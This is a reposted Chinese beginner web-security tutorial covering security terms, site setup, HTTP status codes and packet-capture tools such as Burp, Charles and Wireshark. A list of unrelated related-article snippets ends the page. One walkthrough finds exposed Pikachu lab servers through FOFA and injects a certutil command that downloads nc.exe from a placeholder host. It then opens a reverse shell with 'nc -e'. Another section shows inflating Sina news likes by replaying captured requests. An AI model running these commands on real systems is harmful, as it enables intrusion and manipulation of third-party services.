安全基础从0开始

文章目录

  • 常见名词
    • 小实战
  • 网站搭建
    • 小实战
    • 抓包模拟器
    • 状态码返回值
    • 网站搭建
    • WEB应用安全漏洞
  • 数据包&封包&信息收集
    • **参考点**

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

小实战

  • fofa暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"命令,查询在线pikachu服务器,进入测试命令执行漏洞

    eg

  • 执行命令,查看回显

    eg

  • 查看本机是哪种服务器,接着使用下载命令,将远程连接nc下载到本地,并命名为n.exe
    文档下载命令转换

    eg

  • 选择CMD下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe,出现以下,表示下载完成,也可以使用dir查看
    eg
    COMPLETE

  • 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566;成功连接上远端服务器。
    success

网站搭建

Web应用&架构搭建&漏洞概念&HTTP

Web应用&架构
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等

小实战

一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。

  • 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。

eg

  • 开启burpsuite抓包,并右键送至中继器(repeater)
    eg

  • 关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。
    end

抓包模拟器

在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite抓包,观看数据包的区别。

  • burpsuite中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
    代理配置
  • 模拟器更改配置,代理--手动代理服务器主机名改为本机IP地址,dialing端口与上述一致,为8888,如下:
    模拟器配置
  • 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:
    数据包

通过User-Agent可知其发生差异的原因

状态码返回值

参考文章1
参考文章2
400:发送请求有语法错误
403:文件夹存在,没有权限访问
404:访问资源不存在(文件/文件夹)
3xx:跳转,处置过程,判断可有可无
    重定向(302)
5xx:内部错误,服务器问题,判断可有可无
    500.服务器内部异常
    504.服务器请求超时,没有返回结果

在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描
购买快代理,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。

网站搭建

安装的前提条件:

  • 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
  • 服务器安装宝塔集成环境,方便操作使用
  • 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用FinalShell进行连接,在远程服务器上进行操作

选择安装
选用Windows搭建:

  • 使用远端mstsc进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
    选用按量收费,双核4G,服务器选用Windows版本
    eg
  • 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
    eg
  • 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
    eg
  • 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
    面板
  • 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。
    界面
    Win参考连接
    Linux参考连接

WEB应用安全漏洞

Web应用安全漏洞分类
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

安全漏洞解释

数据包&封包&信息收集

参考连接

抓包的意义:     在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。

抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。

抓包的协议:     抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像

抓包的支持:     其实就是目标他支持哪些抓包工具,支持哪些协议

封包的意义:     封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器

参考点

Fiddler:
    是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。

手机证书安装,需要将防火墙关闭,安装证书步骤参考
eg

Charles:
    是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。

    在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书,接着会让输入密码,安装就能抓包。

抓取的包全部出现unknow的解决方法
proxy --> SSL Proxying Settings --> Add
来添加主机和端口,
如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略
egeg
工具栏
从左到右分别为:

(1)清除当前会话
(2)开始记录
(3)开启SSL代理
(4)开始限流/停止限流
(5)开始断点/停止断点
(6)根据所写内容撰写新请求
(7)重发选定请求
(8)工具
(9)设置

Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包

TCPDump:
    是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

BurpSuite:
    是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Wireshark:
    是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

WireShark使用教程

科来网络分析系统:
    是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

WPE&封包分析:
    是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

封包拦截器
封包监听工具

Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878

Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449

BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/212614.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于ssm应急资源管理系统论文

摘 要 现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本应急资源管理系统就是在这样的大环境下诞生,其可以帮助管理者在短时间内处理完毕庞大的数据信息…

排序算法之七:归并排序(递归)

基本思想 基本思想: 归并排序(MERGE-SORT)是建立在归并操作上的一种有效的排序算法,该算法是采用分治法(Divide and Conquer)的一个非常典型的应用。将已有序的子序列合并,得到完全有序的序列&#xff1…

C++:this指针

目录 前言 成员函数返回this指向的对象本身时,为什是返回引用类型? 成员函数返回this对象本身时,内部通常会通过拷贝构造函数来创建一个临时对象? 总结 前言 c通过提供特殊的对象指针,this指针 指向被调用的成员函…

Nodejs 第二十二章(脚手架)

编写自己的脚手架 那什么是脚手架? 例如:vue-cli Angular CLI Create React App 编写自己的脚手架是指创建一个定制化的工具,用于快速生成项目的基础结构和代码文件,以及提供一些常用的命令和功能。通过编写自己的脚手架,你可以…

Linux和Windows环境下如何使用gitee?

1. Linux 1.1 创建远程仓库 1.2 安装git sudo yum install -y git 1.3 克隆远程仓库到本地 git clone 地址 1.4 将文件添加到git的暂存区(git三板斧之add) git add 文件名 # 将指定文件添加到git的暂存区 git add . # 添加新文件和修改过的…

vs2017+qt5.14.2遇到的问题

1、在安装qt插件后,导入pro文件时,报 msvc-version.conf loaded but QMAKE_MSC_VER isn’t set 修改E:\Qt\Qt5.14.2\5.14.2\msvc2017_64\mkspecs\common\msvc-version.conf文件中添加

RabbitMQ学习笔记10 综合实战 实现新商家规定时间内上架商品检查

配置文件: 记住添加这个。 加上这段代码,可以自动创建队列和交换机以及绑定关系。 我们看到了我们创建的死信交换机和普通队列。 我们可以看到我们队列下面绑定的交换机。 我们创建一个controller包进行测试: 启动: 过一段时间会变成死信队列…

SSM与SpringBoot面试题总结

什么是spring?谈谈你对IOC和AOP的理解。 Spring:是一个企业级java应用框架,他的作用主要是简化软件的开发以及配置过程,简化项目部署环境。 Spring的优点: 1、Spring低侵入设计,对业务代码的污染非常低。 2、Spring的DI机制将…

FPGA设计时序约束十一、others类约束之Set_Maximum_Time_Borrow

目录 一、序言 二、Set Maximum Time Borrow 2.1 基本概念 2.2 设置界面 2.3 命令语法 2.4 命令示例 三、参考资料 一、序言 在Vivado的时序约束窗口中,存在一类特殊的约束,划分在others目录下,可用于设置忽略或修改默认的时序路径分析…

IntelliJ IDEA开启git版本控制的简单教程

这篇文章想要分享一下怎么在IntelliJ IDEA开启版本控制,博主使用的是gitee,首先需要安装git,关于git的安装这里就不介绍了,很简单。 目录 创建git仓库 创建项目 开启版本控制 拉取项目 创建git仓库 首先,需要登录…

MATLAB | 官方举办的动图绘制大赛 | 第四周(收官周)赛情回顾

MATHWORKS官方举办的迷你黑客大赛第三期(MATLAB Flipbook Mini Hack)圆满结束,虽然我的水平和很多大佬还有比较大的差距,但所有奖也算是拿满了: 专家评选前三名,以及投票榜前十:~ 每周的阶段性获奖者: 下面…

【Python】手把手教你用tkinter设计图书管理登录UI界面(三)

上一篇:【Python】手把手教你用tkinter设计图书管理登录UI界面(二)-CSDN博客 下一篇: 紧接上一篇文章,继续完善项目功能:用户登录。由于老王的注册部分有亿点点复杂,还没完成,但是…

鸿蒙OS应用开发的开发环境

鸿蒙OS应用开发的开发环境 鸿蒙系统发展越来越快,已经开始走进千家万户,从手机到电视机,再到汽车,以后各种手表、智能设备等等。这已经是一个广泛应用的操作系统,也是跟大家生活密切相关的操作系统。要想在这个平台上…

Kubernetes里的DNS;API资源对象ingress;Kubernetes调度;节点选择器NodeSelector;节点亲和性NodeAffinity

Kubernetes里的DNS K8s集群内有一个DNS服务: kubectl get svc -n kube-system |grep dns测试: 在tang3上安装bind-utils,目的是安装dig命令 yum install -y bind-utils apt install dnsutils #ubuntu上 解析外网域名 dig 10.15.0.10 www.baidu.com…

NSSCTF-Crypto靶场练习--第11-20题wp

文章目录 [SWPUCTF 2021 新生赛]traditional[LitCTF 2023]梦想是红色的 (初级)[SWPUCTF 2021 新生赛]crypto2[羊城杯 2021]Bigrsa[LitCTF 2023]Hex?Hex!(初级)[SWPU 2020]happy[AFCTF 2018]BASE[安洵杯 2019]JustBase[鹤城杯 2021]Crazy_Rsa_Tech[SWPUCT…

我们常说的流应用到底是什么?

流应用是DCloud公司开发的一种可以让手机App安装包实现边用边下的技术。基于HTML5规范的即点即用应用,开发者按照HTML5规范开发的应用,可以在支持HTML5流应用的发行渠道实现即点即用的效果。 流应用是基于 HTML5规范的即点即用应用,开发者按照…

Nacos注册中心客户端容灾

目前Nacos客户端有一个FailoverReactor来进行容灾文件的管理,可以通过在指定磁盘文件里写入容灾数据来进行客户端使用数据的覆盖。FailoverReactor目前会拦截Nacos客户端查询接口调用,以getAllInstances接口为例,目前FailoverReactor的工作流…

【合集】SpringBoot——Spring,SpringBoot,SpringCloud相关的博客文章合集

前言 本篇博客是spring相关的博客文章合集,内容涵盖Spring,SpringBoot,SpringCloud相关的知识,包括了基础的内容,比如核心容器,springMVC,Data Access;也包括Spring进阶的相关知识&…

免费的网页数据抓取工具有哪些?【2024附下载链接】

在网络上,有许多网页数据抓取工具可供选择。本文将探讨其如何全网采集数据并支持指定网站抓取。我们将比较不同的数据采集工具,帮助您找到最适合您需求的工具。 网页数据抓取工具种类 在选择网页数据抓取工具之前,让我们先了解一下这些工具…

[ 蓝桥杯Web真题 ]-布局切换

目录 介绍 准备 目标 规定 思路 解法参考 介绍 经常用手机购物的同学或许见过这种功能,在浏览商品列表的时候,我们通过点击一个小小的按钮图标,就能快速将数据列表在大图(通常是两列)和列表两种布局间来回切换。…